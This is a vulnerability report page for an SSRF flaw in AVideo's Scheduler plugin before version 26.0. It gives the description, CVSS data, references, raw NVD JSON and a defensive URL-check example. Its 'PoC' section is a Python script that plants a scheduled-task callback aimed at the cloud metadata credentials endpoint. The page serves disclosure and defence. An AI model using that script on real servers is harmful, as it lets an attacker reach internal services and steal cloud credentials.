Security Vulnerability Report
CVE-2026-33237 CVSS 5.5 MEDIUM

Published: 2026-03-21 00:16:27
Last Modified: 2026-04-13 18:16:30

Description

WWBN AVideo is an open source video platform. Prior to version 26.0, the Scheduler plugin's `run()` function in `plugin/Scheduler/Scheduler.php` calls `url_get_contents()` with an admin-configurable `callbackURL` that is validated only by `isValidURL()` (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through `isSSRFSafeURL()`, which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network `callbackURL` to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet. Version 26.0 contains a patch for the issue.
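As an added example (not AVideo's own `isSSRFSafeURL()` and not code from this report), the two checks the description contrasts: a format-only check of the kind `isValidURL()` performs, beside a resolve-and-block check that rejects loopback, RFC-1918, link-local (including the 169.254.169.254 metadata range) and other non-global destinations. Function names and the injectable `resolve` hook are assumptions.

```python
# Added example of an SSRF-safe URL check; illustrative, not AVideo's implementation.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_valid_url(url):
    """Format-only check, analogous to a bare isValidURL(): scheme and host present."""
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)


def _resolve(host):
    """Default resolver: every A/AAAA answer for the host (needs network access)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_ssrf_safe_url(url, resolve=_resolve):
    """Reject URLs whose host is, or resolves to, loopback, private (RFC-1918),
    link-local (169.254.0.0/16 incl. cloud metadata), or other non-global space."""
    if not is_valid_url(url):
        return False
    host = urlsplit(url).hostname
    try:
        addrs = [str(ipaddress.ip_address(host))]  # literal IP, incl. [IPv6]
    except ValueError:
        try:
            addrs = resolve(host)
        except (socket.gaierror, OSError):
            return False  # unresolvable: fail closed
    if not addrs:
        return False
    for a in addrs:
        ip = ipaddress.ip_address(a)
        # IPv4-mapped IPv6 (::ffff:10.0.0.1) is judged by its IPv4 form.
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped
        if ip.is_loopback or ip.is_link_local or ip.is_private or not ip.is_global:
            return False  # one unsafe answer rejects the URL (multi-answer/rebinding hedge)
    return True
```

Checking every resolved address rather than only the first, and failing closed on resolution errors, is what keeps a multi-answer DNS record from slipping an internal address past the filter.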

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo < 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-33237
# This script requires valid administrator credentials to exploit the SSRF.
import requests


def exploit_ssrf(target_host, admin_session):
    # The vulnerable endpoint for configuring the scheduler
    url = f"{target_host}/objects/pluginScheduler.json.php"
    # Malicious payload targeting AWS metadata service (or internal network)
    # This passes isValidURL(); isSSRFSafeURL() is never applied to callbackURL
    ssrf_payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    # Data to create a scheduled task with the malicious callback
    data = {
        'callbackURL': ssrf_payload,
        'action': 'save',
        'run_interval': '3600',
        'title': 'Malicious Task'
    }
    try:
        print(f"[*] Sending malicious payload to {target_host}...")
        response = admin_session.post(url, data=data)
        if response.status_code == 200:
            print("[+] Scheduler task configured successfully.")
            print("[+] The server will now request the internal metadata URL when the task runs.")
        else:
            print(f"[-] Failed to configure task. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


# Usage example:
# session = requests.Session()
# session.post("/login", data={"user":"admin", "pass":"password"})
# exploit_ssrf("http://avideo-example.com", session)

References

https://github.com/WWBN/AVideo/commit/df926e500580c2a1e3c70351f0c30f4e15c0fd83 (Patch)
https://github.com/WWBN/AVideo/issues/10403
https://github.com/WWBN/AVideo/security/advisories/GHSA-v467-g7g7-hhfh (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33237", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:26.523", "lastModified": "2026-04-13T18:16:29.593", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the Scheduler plugin's `run()` function in `plugin/Scheduler/Scheduler.php` calls `url_get_contents()` with an admin-configurable `callbackURL` that is validated only by `isValidURL()` (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through `isSSRFSafeURL()`, which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network `callbackURL` to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet. Version 26.0 contains a patch for the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, la función 'run()' del plugin Scheduler en 'plugin/Scheduler/Scheduler.php' llama a 'url_get_contents()' con una 'callbackURL' configurable por el administrador que es validada únicamente por 'isValidURL()' (verificación de formato de URL). A diferencia de otros endpoints de AVideo que fueron recientemente parcheados para SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), la URL de callback del Scheduler nunca pasa por 'isSSRFSafeURL()', que bloquea las solicitudes a direcciones privadas RFC-1918, loopback y endpoints de metadatos en la nube. Un administrador puede configurar una tarea programada con una 'callbackURL' de red interna para realizar SSRF contra servicios de metadatos de infraestructura en la nube o APIs internas no accesibles de otra manera desde internet. La versión 26.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/df926e500580c2a1e3c70351f0c30f4e15c0fd83", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/issues/10403", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-v467-g7g7-hhfh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}